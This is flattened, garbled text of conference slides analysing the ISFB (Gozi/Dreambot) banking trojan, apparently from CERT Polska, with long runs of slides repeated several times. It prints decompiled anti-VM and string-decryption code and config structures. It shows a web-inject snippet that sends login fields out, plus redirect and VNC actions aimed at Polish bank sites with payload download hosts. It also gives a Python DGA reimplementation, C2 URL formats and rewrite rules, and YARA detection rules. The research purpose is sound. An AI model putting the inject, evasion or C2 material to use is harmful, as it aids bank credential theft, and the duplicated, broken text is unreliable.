Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
